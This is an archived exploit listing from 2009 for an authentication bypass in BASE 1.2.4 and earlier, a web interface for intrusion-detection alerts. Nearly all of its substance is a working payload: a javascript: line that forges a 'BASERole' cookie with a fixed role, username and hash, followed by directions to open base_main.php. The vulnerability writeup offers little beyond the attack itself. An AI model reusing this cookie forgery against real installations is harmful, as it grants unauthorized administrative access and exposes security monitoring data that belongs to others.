[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BASE <= 1.2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
# Published : 2009-06-24
# Author : Tim Medin
# Previous Title : Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability
# Next Title : Glossword <= 1.8.11 (index.php x) Local File Inclusion Vulnerability
Authentication Bypass in BASE version 1.2.4 and prior - Insecure
Cookie Handling Vulnerability
--------------------------------------------
Author.: Tim Medin
Contact: nidem.nidem [at] gmail [d0t] com
-------------------------------------------------------------------------------------------------
Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
path=/";
Note: After creating cookie go to http://[website]/base_main.php
# www.Syue.com [2009-06-24]